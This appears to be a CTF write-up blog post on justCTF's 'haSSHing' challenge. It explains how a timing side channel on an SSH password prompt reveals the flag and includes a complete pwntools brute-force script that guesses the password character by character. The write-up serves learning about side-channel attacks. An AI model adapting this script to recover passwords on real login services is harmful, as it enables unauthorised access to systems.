🔻 ihuomtia's blog

Search

SearchSearch

justCTF [PWN] haSSHing

Jun 17, 20243 min read

Description

Solution

We’re presented with an SSH server prompt asking for a password. The only clue? The server takes slightly longer to reject incorrect passwords that share characters with the actual flag. Our goal is to leverage this timing difference to deduce the flag character by character.

Solution Breakdown:

  1. Timing is Everything: We begin by crafting Python code to measure the time the server takes to respond to our password attempts. We extract timestamps from the server’s output and convert them to epoch time for easier calculation.
def datetime_to_epoch(datetime_str):
    datetime_format = "%Y-%m-%d %H:%M:%S.%f"
    dt = datetime.strptime(datetime_str, datetime_format)
    epoch = dt.timestamp()
    return epoch
  1. Setting Up the Connection: We establish an SSH connection using the pwntools library, to interact with the server with ease.
def setup_connection():
    pty = process.PTY
    io = process(["/bin/sh", "-c", "ssh hasshing.nc.jctf.pro -l ctf -p 1337"], stderr=pty, stdin=pty)
    return io
  1. Defining the Search Space: Based on the challenge description, we define the possible characters (password_charset) for the flag.
password_charset = "".join(map(str, range(0, 10))) + "CFT_cdhjlnstuw{}"
password = ""

  1. Exploiting the Timing Oracle: The core of our solution is a loop that iterates through the password_charset. For each character, we:

    • Append it to our partially recovered password.
    • Send the assembled password to the server.
    • Precisely measure the server’s response time.
    • Compare the response time against a calculated threshold. If the response time exceeds the threshold, we’ve likely guessed a correct character.
while True:
	try:
		current_index = 0
		while current_index < len(password_charset):
			c = password_charset[current_index]
			current_password = password + c
			current_password = current_password.encode()
 
			io.recvuntil(b"password:")
			io.sendline(current_password)
 
			output = io.recvuntil(b"]").replace(b"[", b"").replace(b"]", b"").strip()
			then = datetime_to_epoch(output.decode())
 
			output = io.recvuntil(b"]").replace(b"[", b"").replace(b"]", b"").split(b"\n")[1].strip()
			now = datetime_to_epoch(output.decode())
 
			duration = now - then
			trigger_duration = 0.05 * len(current_password)
			dt = duration - trigger_duration
 
			progress.status(f"{current_password} took {duration:.06f}")
 
			current_index += 1
 
			# error handling
			if dt < 0:
				password = password[:-1]
				current_index = previous_index
 
			if dt > 0 and dt > tolerance:
				previous_index = current_index
				current_index = 0
				password += c
				break
  1. Error Handling and Flag Extraction: The code includes error handling to manage incorrect guesses and re-establish the connection if needed. Once we identify the closing ’}’ of the flag format, we extract and display the recovered flag.

The flag:

(ctf@hasshing.nc.jctf.pro) password:    
  
I hear you're worthy of a flag today! Enjoy!  
  
justCTF{s1d3ch4nn3ls_4tw_79828}

Full Script

from pwn import *
from datetime import datetime
 
context.log_level = 'warn'
 
def datetime_to_epoch(datetime_str):
    datetime_format = "%Y-%m-%d %H:%M:%S.%f"
    dt = datetime.strptime(datetime_str, datetime_format)
    epoch = dt.timestamp()
    return epoch
 
def setup_connection():
    pty = process.PTY
    io = process(["/bin/sh", "-c", "ssh hasshing.nc.jctf.pro -l ctf -p 1337"], stderr=pty, stdin=pty)
    return io
 
io = setup_connection()
 
output = io.recvuntil(b"(ctf").replace(b"(ctf", b"")
output = output.split(b" is ")[1].strip()
server_time = datetime_to_epoch(output.decode())
 
password_charset = "".join(map(str, range(0, 10))) + "CFT_cdhjlnstuw{}"
password = ""
 
tolerance = 0.021
previous_index = 0
 
with log.progress('Guessing Password', level=logging.WARN) as progress:
    while True:
        try:
            current_index = 0
            while current_index < len(password_charset):
                c = password_charset[current_index]
                current_password = password + c
                current_password = current_password.encode()
 
                io.recvuntil(b"password:")
                io.sendline(current_password)
 
                output = io.recvuntil(b"]").replace(b"[", b"").replace(b"]", b"").strip()
                then = datetime_to_epoch(output.decode())
 
                output = io.recvuntil(b"]").replace(b"[", b"").replace(b"]", b"").split(b"\n")[1].strip()
                now = datetime_to_epoch(output.decode())
 
                duration = now - then
                trigger_duration = 0.05 * len(current_password)
                dt = duration - trigger_duration
 
                progress.status(f"{current_password} took {duration:.06f}")
 
                current_index += 1
 
                # error handling
                if dt < 0:
                    password = password[:-1]
                    current_index = previous_index
 
                if dt > 0 and dt > tolerance:
                    previous_index = current_index
                    current_index = 0
                    password += c
                    break
 
        except EOFError:
            if current_password[-1] == ord(b'}'):
                io.close()
                log.success(f"Flag: {current_password}")
                exit(0)
 
            io = setup_connection()
 
            output = io.recvuntil(b"(ctf").replace(b"(ctf", b"")
            output = output.split(b" is ")[1].strip()
            server_time = datetime_to_epoch(output.decode())
 
        except KeyboardInterrupt:
            io.close()
            exit()
 
io.interactive()